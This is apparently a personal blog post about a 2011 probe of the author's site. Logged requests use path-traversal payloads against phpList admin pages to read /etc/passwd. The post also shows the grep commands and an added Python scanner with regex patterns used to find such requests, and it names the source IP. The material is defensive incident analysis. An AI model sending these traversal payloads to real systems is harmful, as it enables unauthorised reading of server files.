Attempted Hack on My Site?! Really?!

Exponentially increased traffic?

So I logged in to my site today and noticed my traffic had spiked exponentially! Check out the screenshot of the bar graph (showing yesterday and today for comparison). 300 visitors and 3000 pageviews in a single day? On my humble little website? Way too good to be true!

So I looked further and found some unsettling info in the visitor statistics… It looked something like this:

14:38:08 //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:09 //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:10 //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:10 //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:11 //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:12 //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:13 //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:14 //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:14 //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

Looks like someone was trying to pull an RFI — Remote File Inclusion — attack on my site…

Next I checked my logs:

# grep each indicator straight from the log files (-h drops the filename prefix);
# ">>" appends, so the earlier matches are not overwritten by the later commands
grep -h '\.\./\.\./' /var/www/logs/*.log > /tmp/rfi_attack.log
grep -h 'SERVERQDOCUMENT' /var/www/logs/*.log >> /tmp/rfi_attack.log
grep -h 'DOCUMENT_ROOT' /var/www/logs/*.log >> /tmp/rfi_attack.log
grep -h '\.txt??' /var/www/logs/*.log >> /tmp/rfi_attack.log

and here’s the output:

193.158.67.223 - - [24/Feb/2011:14:38:08 -0700] "GET //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:09 -0700] "GET //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 685 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:10 -0700] "GET //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 679 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:10 -0700] "GET //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:11 -0700] "GET //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:12 -0700] "GET //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 674 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:13 -0700] "GET //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 687 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:14 -0700] "GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:14 -0700] "GET //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 673 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

So it looks like this is the only attack (at least the only one of this type)… I ran some scripts to see if the hacker was able to access and modify any files, but everything came back negative. So for now I am going to try to rest easy and let this one go. I have no idea why anyone would bother messing with my site as they really don’t stand to gain anything, but life is full of stupid people. Right?
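A slightly more structured way to do what the greps above do: parse the combined-format log lines, flag requests that carry the traversal, sensitive-file and superglobal-override markers seen in this probe, and tally them per source IP. This is an added example, not code from the post; the log lines are constructed from the output above plus one ordinary request.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache/nginx "combined" log format, matching the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of file-inclusion / path-traversal probing, in the order they are reported.
SUSPICIOUS = [
    ("traversal", re.compile(r"(\.\./|\.\.\\){2,}")),
    ("sensitive-file", re.compile(r"/etc/passwd|/proc/self/environ")),
    ("superglobal-override", re.compile(r"_SERVER\[|DOCUMENT_ROOT")),
    ("remote-include", re.compile(r"=(https?|ftp)://", re.I)),
]

def classify(path):
    """Return the indicator names matching a request path (URL-decoded twice
    so %2e%2e and double-encoded %252e%252e variants are caught too)."""
    decoded = unquote(unquote(path))
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]

def scan(lines):
    """Parse combined-format lines; return (list of hits, Counter of hits per IP)."""
    hits, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not combined format or truncated: skip instead of crashing
        tags = classify(m["path"])
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "status": int(m["status"]), "tags": tags})
            per_ip[m["ip"]] += 1
    return hits, per_ip

# Constructed sample: two lines from the post's output plus a benign page view.
SAMPLE = [
    '193.158.67.223 - - [24/Feb/2011:14:38:08 -0700] "GET //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../etc/passwd HTTP/1.1" 301 680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '10.0.0.5 - - [24/Feb/2011:15:02:11 -0700] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '193.158.67.223 - - [24/Feb/2011:14:38:12 -0700] "GET //admin/index.php?_SERVER[ConfigFile]=../../../../../../etc/passwd HTTP/1.1" 301 674 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
]

if __name__ == "__main__":
    found, by_ip = scan(SAMPLE)
    for h in found:
        print(h["ts"], h["ip"], h["status"], ",".join(h["tags"]), h["path"])
    print("hits per IP:", dict(by_ip))
```

The status column matters when triaging: a 301 or 404 means the probed path did not exist, whereas a 200 on one of these URLs is what would justify a closer look at the application.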

I would like to assume that the hacker was at least smart enough to work through a proxy, but I also don’t want to overestimate him… so here are a few neat images with info attached to the hacker’s IP address, just for fun… but first, here are a few links for further reading on RFI attacks, how to protect against them, and how to check your logs to see if someone was performing one on you.

193.158.67.223 tried to hack me?
Look 193.158.67.223 is from Germany!
Look here's his ISP and domain!